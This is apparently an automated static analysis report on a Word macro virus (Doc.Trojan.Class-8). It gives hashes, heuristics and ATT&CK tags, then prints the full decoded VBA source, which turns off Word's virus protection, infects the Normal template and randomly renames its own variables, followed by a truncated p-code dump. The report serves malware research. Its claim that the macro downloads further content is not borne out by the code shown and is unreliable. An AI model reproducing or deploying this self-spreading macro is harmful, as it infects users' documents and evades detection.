Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 34b364d538e93ae7…

MALICIOUS

Office (OLE)

48.0 KB Created: 1998-12-12 16:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5c71303a31853917f08adc37a8ec32eb SHA-1: 89321f9485f6d4108ef3e3ce8b56ac155959db1f SHA-256: 34b364d538e93ae73f229cd2319fb4ae1ba61ae842110aca1b73103b5169b999
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, specifically triggering AutoOpen and AutoClose events. Heuristics indicate the presence of macros and legacy WordBasic auto-execution markers. The VBA script attempts to obfuscate its actions by manipulating macro code, suggesting an intent to download and execute further malicious content. The ClamAV detection further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Class-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-8
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9420 bytes
SHA-256: 89ff56a525321acf5992e53e6fcbf21a1c6d2a8920fc64491b33c506853e77ee
Detection
ClamAV: Doc.Trojan.Class-8
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Options.ConfirmConversions = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
PE8690 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
GL8530 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set RQ4058 = ActiveDocument.VBProject.VBComponents.Item(1)
EM333 = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set RQ4058 = NormalTemplate.VBProject.VBComponents.Item(1)
DV094 = True
Call QE896_JI08
End If
If DV094 <> True And EM333 <> True Then GoTo SA2266
If DV094 = True Then RQ4058.CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, PE8690 - 1))
If EM333 = True Then RQ4058.CodeModule.AddFromString ("Sub AutoOpen()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, GL8530 - 1))
SA2266:
If GL8530 <> 0 And PE8690 = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Private Sub QE896_JI08()
On Error Resume Next
Randomize
Dim r1(1 To 14) As String
r1(1) = "EN642": r1(2) = "FK2681": r1(3) = "FP2810": r1(4) = "LM8433": r1(5) = "JI08": r1(6) = "PE8690"
r1(7) = "GL8530": r1(8) = "EM333":: r1(9) = "RQ4058": r1(10) = "DV094": r1(11) = "SA2266": r1(12) = "QE896": r1(13) = "LD4177": r1(14) = "SD8150"
For x = 1 To 14
a1 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 100) & Int(Rnd * 100)
Call JI08(a1, r1(x))
Next x
End Sub
Private Sub JI08(SD8150, LD4177 As String)  'v1.0
On Error Resume Next
Dim EN642 As Long: Dim FK2681 As Long: Dim FP2810 As Long: Dim LM8433 As Long
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
EN642 = 1: FK2681 = 1: FP2810 = .CountOfLines: LM8433 = Len(.Lines(.CountOfLines, 1))
Do While .Find(LD4177, EN642, FK2681, FP2810, LM8433, True)
strline = .Lines(EN642, 1)
strline = Left(strline, FK2681 - 1) & SD8150 & Mid(strline, LM8433)
.replaceline EN642, strline
EN642 = FP2810 + 1: FK2681 = 1:
FP2810 = .CountOfLines
LM8433 = Len(.Lines(.CountOfLines, 1))
Loop
End With
End Sub

' Processing file: /opt/analyzer/scan_staging/1b6a965840b046c386d4ac4061735373.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 14480 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #3:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St PE8690 
' Line #6:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St GL8530 
' Line #7:
' 	LitDI2 0x0001 
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0003 "Sub"
' 	Ne 
' 	IfBlock 
' Line #8:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set RQ4058 
' Line #9:
' 	LitVarSpecial (True)
' 	St EM333 
' Line #10:
' 	EndIfBlock 
' Line #11:
' 	LitDI2 0x0001 
' 	LitDI2 0x0003 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0003 
... (truncated)